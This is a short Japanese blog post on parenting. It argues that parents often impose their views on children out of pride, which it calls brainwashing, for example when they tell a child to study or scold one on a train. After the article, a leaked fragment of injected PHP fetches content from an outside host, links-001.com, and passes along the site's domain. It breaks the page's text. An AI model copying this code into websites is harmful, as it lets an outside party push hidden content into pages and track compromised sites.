前へ
次へ

親の押し付けをしすぎないことが大事

親は、子供を教育するときに子供に対して自分の意見や考え方を押し付ける結構があります。
例えば、勉強しなさいの一言の中には単に子供が将来困るから勉強させるのではなく、勉強しない自分の子供が悪い点数を取って他の子と比べが出た場合、親の立場の自分が恥ずかしく感じるからでしょう。
このように、一見子供のためと言いつつも実は親の名誉やプライドのために子供を操作することもあり得ます。
これがいわゆる洗脳と呼ばれるものです。
またそれだけではなく、例えば電車の中で騒いでいる自分の子供を見た場合、静かにしなさいと叱り付けるのが普通です。
ですが、この叱りつける行為にも二面性があることに気がついているでしょうか。
1つは、周りの人の迷惑にならないようにさせることです。
そしてもう一つは自分が他のお客さんから非常識な親だと思われないようにするためです。
これもある意味、子供に対する親の洗脳といえます。
だからといって、叱らないわけにはいきませんが少なくとも日常から子供を洗脳している自分の存在をよく理解しておくことです。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top